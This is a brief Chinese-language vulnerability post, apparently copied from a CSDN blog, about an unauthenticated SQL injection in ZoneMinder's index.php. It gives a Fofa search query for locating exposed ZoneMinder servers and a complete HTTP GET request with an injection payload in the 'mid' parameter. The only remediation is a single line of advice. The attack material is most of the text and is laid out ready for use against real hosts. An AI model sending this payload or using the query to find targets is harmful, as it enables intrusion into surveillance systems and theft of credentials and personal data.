0x01 漏洞描述:
ZoneMinder(简称ZM)是一套基于Linux操作系统的摄像机的视像数据监控的应用软件(大家可以简单理解为网络摄像机)。ZoneMinder支持单一或多台视像镜头应用,包括摄取、分析、记录(包括移动侦测功能)、和监视来源。index.php接口处存在sql注入,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
0x02 搜索语句:
Fofa:icon_hash="-1218152116"
0x03 漏洞复现:
GET /zm/index.php?limit=20&mid=-1%20OR%203*233*1=699%20AND%20000322=000322&order=desc&request=watch&sort=Id&view=request HTTP/1.1
User-Agent:Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/94.0.2558.72Safari/537.36
Host: your-ip
Accept-Encoding: gzip, deflate
Accept:*/*
0x04 修复建议:
关闭互联网暴露面或接口设置访问权限标签:视频,index,漏洞,537.36,SQL,权限,ZoneMinder From: https://blog.csdn.net/xc_214/article/details/141635038